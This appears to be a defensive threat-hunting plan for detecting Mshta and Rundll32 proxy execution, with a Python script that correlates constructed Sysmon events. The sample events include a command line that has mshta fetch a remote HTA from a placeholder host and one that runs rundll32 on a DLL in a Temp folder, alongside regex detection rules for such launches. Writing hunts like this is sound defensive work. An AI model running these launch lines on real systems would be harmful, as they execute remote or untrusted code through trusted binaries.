Volt Typhoon against energy etc.

Name:
Volt Typhoon against energy etc.

TTP:
T1218.005 System Binary Proxy Execution: Mshta, T1218.011 System Binary Proxy Execution: Rundll32

Hypothesis:

Attackers may be using Mshta.exe or Rundll32.exe to execute malicious code.

Campaign Type:
Data Driven

Data Sources:

  • Process Monitoring (Sysmon Event ID 1)
  • Process Command-Line Parameters (Sysmon Event ID 1)
  • Loaded DLLs (Sysmon Event ID 7)
  • Windows Registry (Security Event ID 4663)

Tools:

  • Sysmon
  • Process Monitor
  • PowerShell Arsenal

Scenario:

  1. Initial Access: Attacker gains initial access through phishing or other means.
  2. Defense Evasion: Attacker uses MSHTA or Rundll32 to execute malicious code and evade detection.
  3. Persistence: Attacker establishes persistence on the compromised system.
  4. Privilege Escalation: Attacker elevates privileges to gain higher-level access.
  5. Lateral Movement: Attacker moves laterally to other systems within the network.
  6. Exfiltration: Attacker exfiltrates sensitive data from the compromised environment.
  7. Impact: Attacker achieves their objective, such as data theft, disruption of services, or financial gain.

Hunting Strategy:

  1. Data Analysis: Analyze the collected data sources for suspicious executions of MSHTA or Rundll32.
  2. Event Correlation: Correlate process creation events with module loads and registry accesses to identify related activity.
  3. Outlier Investigation: Investigate any outliers or suspicious events that deviate from the established baseline.
  4. Threat Validation: Validate potential threats by examining the full command line of the process, the loaded DLLs, and the accessed registry keys.
  5. Remediation: Isolate the compromised systems, terminate the malicious processes, and remove any persistence mechanisms.
  6. Reporting: Document the findings of the threat hunt, including the IOCs, TTPs, and the attack timeline.
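One way to carry out the data-analysis, correlation and validation steps over Sysmon telemetry, as an added example that is not part of the original hunt plan: the events below are constructed in the shape of Sysmon Event ID 1 and 7 records, and the heuristics (a URL or inline script on the mshta command line, a rundll32 module under a user-writable path, an Office parent process, and an image load correlated back to the same ProcessGuid) are assumptions chosen for illustration, to be tuned against the environment's own baseline.

```python
import re
from collections import defaultdict

# Constructed Sysmon-style events (ID 1 = process create, ID 7 = image load); not real telemetry.
SAMPLE_EVENTS = [
    {"EventID": 1, "ProcessGuid": "{A1}", "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta.exe http://example.invalid/a.hta",
     "ParentImage": r"C:\Program Files\Microsoft Office\WINWORD.EXE"},
    {"EventID": 1, "ProcessGuid": "{B2}", "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe C:\Users\bob\AppData\Local\Temp\upd.dll,Start",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"EventID": 7, "ProcessGuid": "{B2}", "Image": r"C:\Windows\System32\rundll32.exe",
     "ImageLoaded": r"C:\Users\bob\AppData\Local\Temp\upd.dll"},
    {"EventID": 1, "ProcessGuid": "{C3}", "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": "rundll32.exe shell32.dll,Control_RunDLL",   # benign baseline use
     "ParentImage": r"C:\Windows\explorer.exe"},
]

LOLBINS = ("mshta.exe", "rundll32.exe")
OFFICE_PARENTS = ("winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe")
USER_WRITABLE = re.compile(r"\\(users|temp|programdata|appdata)\\", re.I)
CMDLINE_RULES = [  # assumed heuristics; tune against the local baseline
    (re.compile(r"mshta(\.exe)?\s+\S*(https?:|javascript:|vbscript:)", re.I),
     "mshta launched with a URL or inline script"),
    (re.compile(r"rundll32(\.exe)?\s+javascript:", re.I), "rundll32 javascript: handler"),
    (re.compile(r"rundll32(\.exe)?\s*$", re.I), "rundll32 with no module argument"),
]
def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def hunt(events):
    # Returns {ProcessGuid: sorted reasons}; a GUID with no reasons is not reported.
    findings = defaultdict(set)
    for ev in events:
        if basename(ev.get("Image", "")) not in LOLBINS:
            continue
        guid = ev["ProcessGuid"]
        if ev["EventID"] == 1:  # process creation: command line and parent
            cmd = ev.get("CommandLine", "")
            for rx, why in CMDLINE_RULES:
                if rx.search(cmd):
                    findings[guid].add(why)
            if USER_WRITABLE.search(cmd):
                findings[guid].add("module path in user-writable location")
            if basename(ev.get("ParentImage", "")) in OFFICE_PARENTS:
                findings[guid].add("spawned by an Office application")
        elif ev["EventID"] == 7 and USER_WRITABLE.search(ev.get("ImageLoaded", "")):
            findings[guid].add("loaded DLL from user-writable path: " + ev["ImageLoaded"])
    return {g: sorted(r) for g, r in findings.items()}
```

The benign Control Panel invocation in the sample ({C3}) produces no finding, which is the false-positive case the plan calls out; each flagged GUID carries every reason that fired so the validation step can weigh them together.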

False Positive Consideration:

  • Legitimate use of MSHTA or Rundll32 by system administrators or users.
  • Automated scripts or tools that utilize these executables for benign purposes.

Recommendations:

  • Implement application control rules to restrict the use of MSHTA and Rundll32.
  • Monitor for suspicious command-line parameters and loaded DLLs associated with these executables.
  • Educate users and administrators about the risks of executing untrusted HTA files.

D3 Diagram: